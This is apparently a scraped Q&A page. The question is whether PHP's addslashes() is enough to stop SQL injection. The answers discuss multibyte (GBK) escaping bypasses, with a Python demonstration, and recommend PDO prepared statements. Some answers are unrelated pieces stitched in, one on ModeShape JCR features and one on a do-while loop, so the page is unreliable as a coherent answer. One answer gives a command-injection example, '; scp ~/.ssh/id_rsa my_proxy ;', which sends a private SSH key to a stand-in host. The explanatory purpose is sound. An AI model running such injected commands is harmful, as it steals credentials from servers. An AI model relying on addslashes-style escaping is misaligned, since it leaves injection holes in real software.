
Why do we need DB-specific functions like mysql_real_escape_string()? What can it do that addslashes() doesn't?

Ignoring for the moment the superior alternative of parameterized queries, is a webapp that uses addslashes() exclusively still vulnerable to SQL injection, and if yes, how?

 Answers

87

Addslashes is generally not good enough when dealing with multibyte encoded strings.

Wednesday, March 31, 2021
 
AntoineB
answered 7 Months ago
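Why the byte-level approach breaks down, as an added example that is not part of the original answer: a Python model of PHP's addslashes() compared with a charset-aware escaper on GBK input. The function names (addslashes_bytes, escape_aware, unescaped_quotes) and the sample byte strings are constructed for the illustration; as the question itself notes, parameterized queries remain the preferred fix.

```python
def addslashes_bytes(data: bytes) -> bytes:
    """Model of PHP addslashes(): escapes ' " \\ NUL byte by byte, charset-blind."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):          # ' " and backslash
            out += b"\\" + bytes([b])
        elif b == 0x00:
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)

def escape_aware(data: bytes, charset: str) -> bytes:
    """Charset-aware escaping: decode strictly (malformed input is rejected,
    not escaped), escape whole characters, re-encode. A backslash can never
    land inside a multibyte sequence this way."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not well-formed {charset}") from exc
    escaped = []
    for ch in text:
        if ch in ("'", '"', "\\"):
            escaped.append("\\" + ch)
        elif ch == "\x00":
            escaped.append("\\0")
        else:
            escaped.append(ch)
    return "".join(escaped).encode(charset)

def unescaped_quotes(sql_bytes: bytes, charset: str) -> list:
    """Decode as a server using `charset` would and list each single quote not
    preceded by a backslash, i.e. one that would terminate a string literal."""
    text = sql_bytes.decode(charset)
    return [i for i, ch in enumerate(text)
            if ch == "'" and (i == 0 or text[i - 1] != "\\")]

# Constructed inputs. In GBK, 0xBF is a lead byte and 0x5C (backslash) is a
# valid trail byte, so the pair 0xBF 0x5C decodes as one ideograph.
MALFORMED = b"\xbf'"        # lead byte without a valid trail, then a quote
LEGIT = b"\xbf\x5c'"        # a genuine two-byte character, then a quote

if __name__ == "__main__":
    # Byte-wise escaping turns 0xBF 0x27 into 0xBF 0x5C 0x27: the server
    # reads 0xBF5C as one character and the quote survives unescaped.
    print(unescaped_quotes(addslashes_bytes(MALFORMED), "gbk"))   # [1]
    # On well-formed input it escapes the 0x5C inside the character instead,
    # corrupting the data with an extra backslash even though no quote leaks.
    print(addslashes_bytes(LEGIT), escape_aware(LEGIT, "gbk"))
```

The same mismatch is why the escaping routine must know the charset the connection actually uses; an escaper that only sees bytes cannot tell a trail byte from an ASCII backslash.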
36

My recommendations:

  1. ditch mysqli in favor of PDO (with mysql driver)
  2. use PDO parameterized prepared statements

You can then do something like:

// The PDO MySQL DSN uses the key "host" (not "server"); keys are separated by ";" with no spaces.
$pdo_obj = new PDO( 'mysql:host=localhost;dbname=mydatabase',
                    $dbusername, $dbpassword );

$sql = 'SELECT column FROM table WHERE condition=:condition';
$params = array( ':condition' => 1 );

$statement = $pdo_obj->prepare( $sql, 
    array( PDO::ATTR_CURSOR => PDO::CURSOR_FWDONLY ) );
$statement->execute( $params );
$result = $statement->fetchAll( PDO::FETCH_ASSOC );

PROs:

  1. No more manual escaping since PDO does it all for you!
  2. It's relatively easy to switch database backends all of a sudden.

CONs:

  • I cannot think of any.

Monday, August 2, 2021
 
the12
answered 3 Months ago
20

I can answer some of your questions. Full disclosure: I'm the founder and project lead for ModeShape.

Briefly, ModeShape is a lightweight, embeddable, extensible open source JCR repository implementation that federates and unifies content from multiple systems, including file systems, databases, data grids, other repositories, etc. You can use the JCR API to access the information you already have, or use it like a conventional JCR system.

Here are some of the higher-level features of ModeShape:

  • Supports all of the JCR 2.0 required features: repository acquisition; authentication; reading/navigating; query; export; node type discovery; permissions and capability checking
  • Supports most of the JCR 2.0 optional features: writing; import; observation; workspace management; versioning; locking; node type management; same-name siblings; orderable child nodes; shareable nodes; and mix:etag, mix:created and mix:lastModified mixins with autocreated properties.
  • Supports the JCR 1.0 and JCR 2.0 languages (e.g., XPath, JCR-SQL, JCR-SQL2, and JCR-QOM) plus a full-text search language based upon the JCR-SQL2 full-text search expression grammar. Additionally, ModeShape supports some very useful extensions to JCR-SQL2:
    • subqueries in criteria
    • set operations (e.g., "UNION", "INTERSECT", "EXCEPT", each with optional "ALL" clause)
    • limits and offsets
    • duplicate removal (e.g., "SELECT DISTINCT")
    • additional depth, reference and path criteria
    • set and range criteria (e.g., "IN", "NOT IN", and "BETWEEN")
    • arithmetic criteria (e.g., "SCORE(t1) + SCORE(t2)")
    • full outer join and cross joins
    • and more
  • Choose from multiple storage options, including RDBMSes (via Hibernate), data grids (e.g., Infinispan), file systems, or write your own storage connectors as needed.
  • Use the JCR API to access information in existing services, file systems, and repositories. ModeShape connectors project the external information into a JCR repository, potentially federating the information from multiple systems into a single workspace. Write custom connectors to access other systems, too.
  • Upload files and have ModeShape automatically parse and derive structured information representative of what's in those files. This derived information is stored in the repository, where it can be queried and accessed just like any other content. ModeShape supports a number of file types out-of-the-box, including: CND, XML, XSD, WSDL, DDL, CSV, ZIP/JAR/EAR/WAR, Java source, Java classfiles, Microsoft Office, image metadata, and Teiid models and VDBs. Writing sequencers for other file types is also very easy.
  • Automated and extensible MIME type detection, with out-of-the-box detection using file extensions and content-based detection using Aperture.
  • Extensible text extraction framework, with out-of-the-box support for Microsoft Office, PDF, HTML, plain text, and XML files using Tika.
  • Simple clustering using JGroups.
  • Embed ModeShape into your own application.
  • RESTful API (requires deployment into an application server).

These are just some of the highlights. For details on these and other ModeShape features, please see the ModeShape documentation.

Now, here are some specific answers to your numbered questions:

  1. ModeShape is hosted at JBoss.org and uses/integrates with other JBoss technology, because we thought it better to reuse the best-of-breed libraries. But ModeShape definitely is not tied to the JBoss Application Server. ModeShape can be used on other application servers in much the same way as other JCR implementations (typically embedded into a web application). Plus, ModeShape can be embedded into any application; it is, after all, just a regular Java library. It even uses SLF4J so that ModeShape log messages can be sent to the application's logging framework.

    Now, having said that, we do make it easier to deploy ModeShape to a JBoss AS installation with a simple kit: simply unzip, customize the configuration a bit (depending upon your needs), and start your app server. ModeShape will run as a service within the app server, allowing your deployed apps to simply lookup, use and share repositories. ModeShape can even be monitored using the JBoss AS console.

  2. I believe you're referring to our plans to develop a repository visualization tool (much less than a fully-fledged CMS system). Work on that has just recently begun, and we'd welcome any insight, requests for functionality, and interest in collaborating with us. I know that Magnolia can be run on top of ModeShape, but not sure if other CMS apps are able to do this. The JBoss Enterprise Data Services (EDS) platform also includes ModeShape and uses it as a metadata repository. The JBoss Business Rules Management System can also use ModeShape as its JCR repository.

  3. ModeShape and Jackrabbit both internally use Lucene for full-text search and querying. In that regard, they're pretty similar. Of course, ModeShape's implementation of search and query parsing and execution is different from Jackrabbit's, and was actually written by some of the same folks that implemented the MetaMatrix relationally-oriented integration & federation engine (now part of JBoss EDS). As a result, ModeShape has a separate parser for each of its query languages, but after that all validation, planning, and execution of all queries is done in the same way. We're very proud of the capabilities and performance of our query engine!

  4. ModeShape does not have a connector to other CMIS systems, but as you point out that's currently in-work (MODE-650). We'd also like to work with the Apache Chemistry team to make sure the JCR adapter works with ModeShape. We've just not had the time to do so.

  5. ModeShape does have a JcrTools utility class that may prove useful. But any utility class written on top of the JCR API should work just fine.

Hope that helps!

Sunday, August 8, 2021
 
Mark Comix
answered 3 Months ago
28

It is a do-while loop. So it will do everything in the following block while count is less than or equal to 5. The difference between this and a normal while loop is that the condition is evaluated at the end of the loop, not the start. So the loop is guaranteed to execute at least once.

Sun tutorial on while and do-while.

Oh, and in this case it will print:

1, 2
1, 2, 3, 4

Edit: just so you know there will also be a new line at the start, but the formatting doesn't seem to let me show that.

Monday, August 23, 2021
 
Asperi
answered 2 Months ago
52

Common practice for customer-facing applications is to have an API-endpoint for each database query, which will require user authentication. The API server will then validate the input while formatting the query.

Directly exposing bash on a server is never a good idea. Besides SQL injection, other much worse situations, like ; scp ~/.ssh/id_rsa my_proxy ;, can easily happen.


It appears that security is not OP's primary concern based on the comments below. Rather, the main focus is generating valid queries.

For that, the simplest solution is to perhaps use existing libraries, and let them handle the formatting. For example, in Python there is

https://dev.mysql.com/doc/connector-python/en/

Usually insertion should be done in batch for efficiency. But if preferred, you can write a script for inserting a row like

python3 tableX_insert.py --field1 value1 --field2 value2

I am sure in other languages similar modules for DB conn and cursor exist. Any effort to do the same with raw bash command line is re-inventing wheels.

Tuesday, August 31, 2021
 
TMichel
answered 2 Months ago